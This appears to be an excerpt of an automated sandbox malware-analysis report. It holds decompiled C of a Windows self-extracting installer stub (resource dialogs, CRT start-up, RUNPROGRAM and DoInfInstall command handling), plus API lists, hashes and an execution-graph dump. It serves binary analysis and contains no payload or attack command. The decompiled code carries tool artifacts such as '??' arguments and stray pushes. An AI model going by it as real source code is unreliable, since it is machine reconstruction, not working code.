• Instruction Fuzzy Hash: AC1125B52446416FE7189F649C18F763B7AEBC5310B14C519FA8A8B741DB358C86C660
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
E00176517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
	struct HRSRC__* _t6;
	void* _t21;
	struct HINSTANCE__* _t23;
	int _t24;

	_t23 =  *0x179a3c; // 0x170000
	_t6 = FindResourceA(_t23, __edx, 5);
	if(_t6 == 0) {
		L6:
		E001744B9(0, 0x4fb, 0, 0, 0x10, 0);
		_t24 = _a16;
	} else {
		_t21 = LoadResource(_t23, _t6);
		if(_t21 == 0) {
			goto L6;
		} else {
			if(_a12 != 0) {
				_push(_a12);
			} else {
				_push(0);
			}
			_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
			FreeResource(_t21);
			if(_t24 == 0xffffffff) {
				goto L6;
			}
		}
	}
	return _t24;
}

APIs
• FindResourceA.KERNEL32(00170000,000007D6,00000005), ref: 0017652A
• LoadResource.KERNEL32(00170000,00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00176538
• DialogBoxIndirectParamA.USER32(00170000,00000000,00000547,001719E0,00000000), ref: 00176557
• FreeResource.KERNEL32(00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00176560
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: ac37d8fdfe285fdcf0d459996bf25cbae071c3a1c3e6bee794674481cf29de73
• Instruction ID: 92b5efcf7cd274a0d4c4277d539c790f334fe68eb2fcfda1f108ba0b5c99661f
• Opcode Fuzzy Hash: ac37d8fdfe285fdcf0d459996bf25cbae071c3a1c3e6bee794674481cf29de73
• Instruction Fuzzy Hash: AE012672200A05BBDB105F69AC08DBB7A7CEFC97A1F444125FE0893190D7718C90EAA1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
E00173680(void* __ecx) {
	void* _v8;
	struct tagMSG _v36;
	int _t8;
	struct HWND__* _t16;

	_v8 = __ecx;
	_t16 = 0;
	while(1) {
		_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
		if(_t8 == 0) {
			break;
		}
		if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
			continue;
		} else {
			do {
				if(_v36.message != 0x12) {
					DispatchMessageA( &_v36);
				} else {
					_t16 = 1;
				}
				_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
			} while (_t8 != 0);
			if(_t16 == 0) {
				continue;
			}
		}
		break;
	}
	return _t8;
}

APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0017369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736B2
• DispatchMessageA.USER32(?), ref: 001736CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736DA
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: ef735e7fe516d0a518ef5e4686a03ff47d186475c6326f8c63b6744652eabe67
• Instruction ID: 66a462d6b46c0ea7c96fdb8bebc132f52226f2ac1d4c8015741ed92f8a94a665
• Opcode Fuzzy Hash: ef735e7fe516d0a518ef5e4686a03ff47d186475c6326f8c63b6744652eabe67
• Instruction Fuzzy Hash: 800184729002547BDB304AA65C48EEF767CEBC5B11F50411DB919E2180D6608680D660
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
E001765E8(char* __ecx) {
	char _t3;
	char _t10;
	char* _t12;
	char* _t14;
	char* _t15;
	CHAR* _t16;

	_t12 = __ecx;
	_t15 = __ecx;
	_t14 =  &(__ecx[1]);
	_t10 = 0;
	do {
		_t3 =  *_t12;
		_t12 =  &(_t12[1]);
	} while (_t3 != 0);
	_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
	while(1) {
		_t16 = CharPrevA(_t15, ??);
		if(_t16 <= _t15) {
			break;
		}
		if( *_t16 == 0x5c) {
			L7:
			if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
				_t16 = CharNextA(_t16);
			}
			 *_t16 = _t10;
			_t10 = 1;
		} else {
			_push(_t16);
			continue;
		}
		L11:
		return _t10;
	}
	if( *_t16 == 0x5c) {
		goto L7;
	}
	goto L11;
}

                                                                                                                                                                                                    0x00176610
                                                                                                                                                                                                    0x00176644
                                                                                                                                                                                                    0x00176647
                                                                                                                                                                                                    0x00176647
                                                                                                                                                                                                    0x00176621
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00172B33), ref: 00176602
• CharPrevA.USER32(?,00000000), ref: 00176612
• CharPrevA.USER32(?,00000000), ref: 00176629
• CharNextA.USER32(00000000), ref: 00176635
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 256665d42286f29eb8ae50ab837e03becefeadc6c82410935490cda8d53cdcbb
• Instruction ID: 48379ef267d601941acf543064745720a89f9b77e0085cc9e4692dd50ffa6231
• Opcode Fuzzy Hash: 256665d42286f29eb8ae50ab837e03becefeadc6c82410935490cda8d53cdcbb
• Instruction Fuzzy Hash: 20F028320089506EE7321B398C88DBBBFBDCFCB355BA941BFF59D82401D7150D868661
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* CRT start-up initialisation (MSVCRT): selects the application type,
   copies the program's default file and commit modes into the CRT,
   installs a user math-error handler and then calls E001771EF, which
   the execution graph resolves to the _controlfp wrapper (3971ef).
   E00176FBE calls GetModuleHandleW (see the APIs list below). */
E001769B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	 *0x1781f8 = E00176C70();
	__set_app_type(E00176FBE(2));          /* app type derived from the module handle lookup */
	 *0x1788a4 =  *0x1788a4 | 0xffffffff;  /* two CRT globals forced to -1 */
	 *0x1788a8 =  *0x1788a8 | 0xffffffff;
	_t4 = __p__fmode();                    /* pointer to the CRT _fmode global */
	_t11 =  *0x178528; // 0x0
	 *_t4 = _t11;                          /* default file mode -> _fmode */
	_t5 = __p__commode();                  /* pointer to the CRT _commode global */
	_t12 =  *0x17851c; // 0x0
	 *_t5 = _t12;                          /* default commit mode -> _commode */
	_t6 = E00177000();
	if( *0x178000 == 0) {
		__setusermatherr(E00177000);       /* E00177000 doubles as the math-error callback */
	}
	E001771EF(_t6);                        /* _controlfp wrapper (execution graph node 3971ef) */
	return 0;
}

0x001769b7
0x001769c2
0x001769c8
0x001769cf
0x001769d8
0x001769de
0x001769e4
0x001769e6
0x001769ec
0x001769f2
0x001769f4
0x00176a00
0x00176a07
0x00176a0d
0x00176a0e
0x00176a15

APIs
• Part of subcall function 00176FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00176FC5
• __set_app_type.MSVCRT ref: 001769C2
• __p__fmode.MSVCRT ref: 001769D8
• __p__commode.MSVCRT ref: 001769E6
• __setusermatherr.MSVCRT ref: 00176A07
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 7c8ac69f893bacfb33e105247402c7cfdce869b2cf3138ebd89ed129af117d76
• Instruction ID: 7f265ab22a6d40245d0f40a1d8e6109acbac09403d2b494076d2d034ee3f0c4c
• Opcode Fuzzy Hash: 7c8ac69f893bacfb33e105247402c7cfdce869b2cf3138ebd89ed129af117d76
• Instruction Fuzzy Hash: 19F01C705483018FD715AB30ED0E6083B71FB55331B508609F46E86AF1CF3A85C1CB12
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 28.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 962
Total number of Limit Nodes: 25
                                                                                                                                                                                                    execution_graph 3119 397270 _except_handler4_common 3120 3969b0 3121 3969b5 3120->3121 3129 396fbe GetModuleHandleW 3121->3129 3123 3969c1 __set_app_type __p__fmode __p__commode 3124 3969f9 3123->3124 3125 396a0e 3124->3125 3126 396a02 __setusermatherr 3124->3126 3131 3971ef _controlfp 3125->3131 3126->3125 3128 396a13 3130 396fcf 3129->3130 3130->3123 3131->3128 3132 3934f0 3133 393504 3132->3133 3134 3935b8 3132->3134 3133->3134 3136 39351b 3133->3136 3137 3935be GetDesktopWindow 3133->3137 3135 393526 3134->3135 3138 393671 EndDialog 3134->3138 3140 39354f 3136->3140 3141 39351f 3136->3141 3154 3943d0 6 API calls 3137->3154 3138->3135 3140->3135 3144 393559 ResetEvent 3140->3144 3141->3135 3143 39352d TerminateThread EndDialog 3141->3143 3143->3135 3145 3944b9 20 API calls 3144->3145 3148 393581 3145->3148 3146 39361d SetWindowTextA CreateThread 3146->3135 3149 393646 3146->3149 3147 3935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3147->3146 3150 39359b SetEvent 3148->3150 3152 39358a SetEvent 3148->3152 3151 3944b9 20 API calls 3149->3151 3153 393680 4 API calls 3150->3153 3151->3134 3152->3135 3153->3134 3155 394463 SetWindowPos 3154->3155 3157 396ce0 4 API calls 3155->3157 3158 3935d6 3157->3158 3158->3146 3158->3147 3159 396ef0 3160 396f2d 3159->3160 3162 396f02 3159->3162 3161 396f27 ?terminate@ 3161->3160 3162->3160 3162->3161 3163 396bef _XcptFilter 2196 394ca0 GlobalAlloc 2197 396a60 2214 397155 2197->2214 2199 396a65 2200 396a76 GetStartupInfoW 2199->2200 2201 396a93 2200->2201 2202 396aa8 2201->2202 2203 396aaf Sleep 2201->2203 2204 396ac7 _amsg_exit 2202->2204 2205 396ad1 2202->2205 2203->2201 2204->2205 2206 396b13 _initterm 2205->2206 2207 396af4 2205->2207 2212 396b2e __IsNonwritableInCurrentImage 2205->2212 2206->2212 2208 396bd6 _ismbblead 
2208->2212 2209 396c1e 2209->2207 2211 396c27 _cexit 2209->2211 2211->2207 2212->2208 2212->2209 2213 396bbe exit 2212->2213 2219 392bfb GetVersion 2212->2219 2213->2212 2215 39717a 2214->2215 2216 39717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 3971e2 2215->2217 2218 3971cd 2216->2218 2217->2199 2218->2217 2220 392c0f 2219->2220 2221 392c50 2219->2221 2220->2221 2222 392c13 GetModuleHandleW 2220->2222 2236 392caa memset memset memset 2221->2236 2222->2221 2225 392c22 GetProcAddress 2222->2225 2225->2221 2233 392c34 2225->2233 2226 392c8e 2228 392c9e 2226->2228 2229 392c97 CloseHandle 2226->2229 2228->2212 2229->2228 2233->2221 2234 392c89 2330 391f90 2234->2330 2347 39468f FindResourceA SizeofResource 2236->2347 2239 392ef3 2241 3944b9 20 API calls 2239->2241 2240 392d2d CreateEventA SetEvent 2242 39468f 7 API calls 2240->2242 2243 392d6e 2241->2243 2244 392d57 2242->2244 2352 396ce0 2243->2352 2245 392d5b 2244->2245 2247 392e1f 2244->2247 2250 39468f 7 API calls 2244->2250 2357 3944b9 2245->2357 2386 395c9e 2247->2386 2253 392d9f 2250->2253 2251 392c62 2251->2226 2277 392f1d 2251->2277 2253->2245 2256 392da3 CreateMutexA 2253->2256 2254 392e3a 2257 392e43 2254->2257 2258 392e52 FindResourceA 2254->2258 2255 392e30 2255->2239 2256->2247 2259 392dbd GetLastError 2256->2259 2412 392390 2257->2412 2262 392e6e 2258->2262 2263 392e64 LoadResource 2258->2263 2259->2247 2261 392dca 2259->2261 2265 392dea 2261->2265 2266 392dd5 2261->2266 2264 392e4d 2262->2264 2427 3936ee GetVersionExA 2262->2427 2263->2262 2264->2243 2268 3944b9 20 API calls 2265->2268 2267 3944b9 20 API calls 2266->2267 2270 392de8 2267->2270 2271 392dff 2268->2271 2272 392e04 CloseHandle 2270->2272 2271->2247 2271->2272 2272->2243 2278 392f6c 2277->2278 2279 392f3f 2277->2279 2571 395164 2278->2571 2281 392f5f 2279->2281 2552 3951e5 2279->2552 2699 393a3f 2281->2699 2284 392f71 2313 39303c 2284->2313 2584 3955a0 

Callgraph

Control-flow Graph
C-Code - Quality: 82%

E00393BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x398004; // 0x74c05eb4
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x399124 =  *0x399124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x398a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0x398c42 != 0) {
				goto L26;
			}
			_t146 =  &_v396;
			_t115 = E0039468F("SHOWWINDOW",  &_v396, 4);
			if(_t115 == 0 || _t115 > 4) {
				L25:
				_t146 = 0x4b1;
				E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
				 *0x399124 = 0x80070714;
				goto L62;
			} else {
				if(_v396 != 1) {
					__eflags = _v396 - 2;
					if(_v396 != 2) {
						_t137 = 3;
						__eflags = _v396 - _t137;
						if(_v396 == _t137) {
							_v304 = 1;
							_v300 = _t137;
						}
						goto L14;
					}
					_push(6);
					_v304 = 1;
					_pop(0);
					goto L11;
				} else {
					_v304 = 1;
					L11:
					_v300 = 0;
					L14:
					if(_t127 != 0) {
						L27:
						_t155 = 1;
						__eflags = _t127 - 1;
						if(_t127 != 1) {
							L31:
							_t132 =  &_v280;
							_t76 = E00391AE8( &_v280,  &_v408,  &_v404); // executed
							__eflags = _t76;
							if(_t76 == 0) {
								L62:
								_t77 = 0;
								L63:
								_pop(_t150);
								_pop(_t156);
								_pop(_t128);
								return E00396CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
							}
							_t157 = _v404;
							__eflags = _t149;
							if(_t149 != 0) {
								L37:
								__eflags = _t157;
								if(_t157 == 0) {
									L57:
									_t151 = _v408;
									_t146 =  &_v352;
									_t130 = _t151; // executed
									_t79 = E00393FEF(_t130,  &_v352); // executed
									__eflags = _t79;
									if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0x398580;
                                                                                                                                                                                                    													if( *0x398580 != 0) {
                                                                                                                                                                                                    														E00392267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0x398180;
                                                                                                                                                                                                    											if( *0x398180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E003944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0x399124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x399a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00396495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E003944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0x399124 = E00396285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E003944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x398a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                    											_t96 =  *0x399a40; // 0x3
                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                    											_t97 =  *0x398a38 & 0x0000ffff;
                                                                                                                                                                                                    											_v380 = 0x399154;
                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                    											_v372 = 0x3991e4;
                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                    											if( *0x398a30 != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t144 =  *0x399a34; // 0x1
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t145 =  *0x398d48; // 0x0
                                                                                                                                                                                                    											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                    											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t145;
                                                                                                                                                                                                    											if(_t145 < 0) {
                                                                                                                                                                                                    												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                    												__eflags = _t104;
                                                                                                                                                                                                    												_v360 = _t104;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t98 =  *0x399a38; // 0x0
                                                                                                                                                                                                    											_v356 = _t98;
                                                                                                                                                                                                    											_t130 = _t146;
                                                                                                                                                                                                    											 *0x39a288( &_v384);
                                                                                                                                                                                                    											_t101 = _v404();
                                                                                                                                                                                                    											__eflags = _t164 - _t164;
                                                                                                                                                                                                    											if(_t164 != _t164) {
                                                                                                                                                                                                    												_t130 = 4;
                                                                                                                                                                                                    												asm("int 0x29");
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											 *0x399124 = _t101;
                                                                                                                                                                                                    											_push(_t129);
                                                                                                                                                                                                    											__eflags = _t101;
                                                                                                                                                                                                    											if(_t101 < 0) {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												goto L61;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												_t127 = _v400;
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
							}
							__eflags =  *0x399a40 - 1; // 0x3
							if(__eflags == 0) {
								goto L37;
							}
							__eflags =  *0x398a20;
							if( *0x398a20 == 0) {
								goto L37;
							}
							__eflags = _t157;
							if(_t157 != 0) {
								goto L38;
							}
							_v388 = 1;
							E0039202A(_t146); // executed
							goto L37;
						}
						_t146 =  &_v280;
						_t108 = E0039468F("POSTRUNPROGRAM",  &_v280, 0x104);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L25;
						}
						__eflags =  *0x398c42;
						if( *0x398c42 != 0) {
							goto L69;
						}
						_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
						__eflags = _t112 == 0;
						if(_t112 == 0) {
							goto L69;
						}
						goto L31;
					}
					_t118 =  *0x398a38; // 0x0
					if(_t118 == 0) {
						L23:
						if(_t153 != 0) {
							goto L31;
						}
						_t146 =  &_v276;
						if(E0039468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
							goto L27;
						}
						goto L25;
					}
					if((_t118 & 0x00000001) == 0) {
						__eflags = _t118 & 0x00000002;
						if((_t118 & 0x00000002) == 0) {
							goto L62;
						}
						_t140 = "USRQCMD";
						L20:
						_t146 =  &_v276;
						if(E0039468F(_t140,  &_v276, 0x104) == 0) {
							goto L25;
						}
						if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
							_t153 = 1;
							_v388 = 1;
						}
						goto L23;
					}
					_t140 = "ADMQCMD";
					goto L20;
				}
			}
			L26:
			_push(_t130);
			_t146 = 0x104;
			E00391781( &_v276, 0x104, _t130, 0x398c42);
			goto L27;
		}
	}
	_t130 = "REBOOT";
	_t125 = E0039468F(_t130, 0x399a2c, 4);
	if(_t125 == 0 || _t125 > 4) {
		goto L25;
	} else {
		goto L3;
	}
}
                                                                                                                                                                                                    0x00393f26
                                                                                                                                                                                                    0x00393f2a
                                                                                                                                                                                                    0x00393f2d
                                                                                                                                                                                                    0x00393fd9
                                                                                                                                                                                                    0x00393fd9
                                                                                                                                                                                                    0x00393fda
                                                                                                                                                                                                    0x00393fda
                                                                                                                                                                                                    0x00393fe1
                                                                                                                                                                                                    0x00393fe3
                                                                                                                                                                                                    0x00393fe3
                                                                                                                                                                                                    0x00393fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393fe8
                                                                                                                                                                                                    0x00393f33
                                                                                                                                                                                                    0x00393f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f37
                                                                                                                                                                                                    0x00393dee
                                                                                                                                                                                                    0x00393dee
                                                                                                                                                                                                    0x00393df5
                                                                                                                                                                                                    0x00393fad
                                                                                                                                                                                                    0x00393fb9
                                                                                                                                                                                                    0x00393fc2
                                                                                                                                                                                                    0x00393fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393fc8
                                                                                                                                                                                                    0x00393dfb
                                                                                                                                                                                                    0x00393dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393e03
                                                                                                                                                                                                    0x00393e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393e15
                                                                                                                                                                                                    0x00393e17
                                                                                                                                                                                                    0x00393e19
                                                                                                                                                                                                    0x00393f94
                                                                                                                                                                                                    0x00393fa4
                                                                                                                                                                                                    0x00393f7c
                                                                                                                                                                                                    0x00393f80
                                                                                                                                                                                                    0x00393f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f8b
                                                                                                                                                                                                    0x00393e2c
                                                                                                                                                                                                    0x00393e30
                                                                                                                                                                                                    0x00393e34
                                                                                                                                                                                                    0x00393e36
                                                                                                                                                                                                    0x00393f69
                                                                                                                                                                                                    0x00393f6e
                                                                                                                                                                                                    0x00393f70
                                                                                                                                                                                                    0x00393f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f76
                                                                                                                                                                                                    0x00393e3c
                                                                                                                                                                                                    0x00393e43
                                                                                                                                                                                                    0x00393e47
                                                                                                                                                                                                    0x00393e52
                                                                                                                                                                                                    0x00393e56
                                                                                                                                                                                                    0x00393e5c
                                                                                                                                                                                                    0x00393e61
                                                                                                                                                                                                    0x00393e68
                                                                                                                                                                                                    0x00393e70
                                                                                                                                                                                                    0x00393e74
                                                                                                                                                                                                    0x00393e7c
                                                                                                                                                                                                    0x00393e80
                                                                                                                                                                                                    0x00393e82
                                                                                                                                                                                                    0x00393e82
                                                                                                                                                                                                    0x00393e87
                                                                                                                                                                                                    0x00393e87
                                                                                                                                                                                                    0x00393e8b
                                                                                                                                                                                                    0x00393e91
                                                                                                                                                                                                    0x00393e94
                                                                                                                                                                                                    0x00393e96
                                                                                                                                                                                                    0x00393e96
                                                                                                                                                                                                    0x00393e9b
                                                                                                                                                                                                    0x00393e9b
                                                                                                                                                                                                    0x00393e9f
                                                                                                                                                                                                    0x00393ea2
                                                                                                                                                                                                    0x00393ea4
                                                                                                                                                                                                    0x00393ea4
                                                                                                                                                                                                    0x00393ea9
                                                                                                                                                                                                    0x00393ea9
                                                                                                                                                                                                    0x00393ead
                                                                                                                                                                                                    0x00393eb3
                                                                                                                                                                                                    0x00393eb6
                                                                                                                                                                                                    0x00393eb8
                                                                                                                                                                                                    0x00393eb8
                                                                                                                                                                                                    0x00393ebd
                                                                                                                                                                                                    0x00393ebd
                                                                                                                                                                                                    0x00393ec1
                                                                                                                                                                                                    0x00393ec3
                                                                                                                                                                                                    0x00393ec5
                                                                                                                                                                                                    0x00393ec5
                                                                                                                                                                                                    0x00393eca
                                                                                                                                                                                                    0x00393eca
                                                                                                                                                                                                    0x00393ece
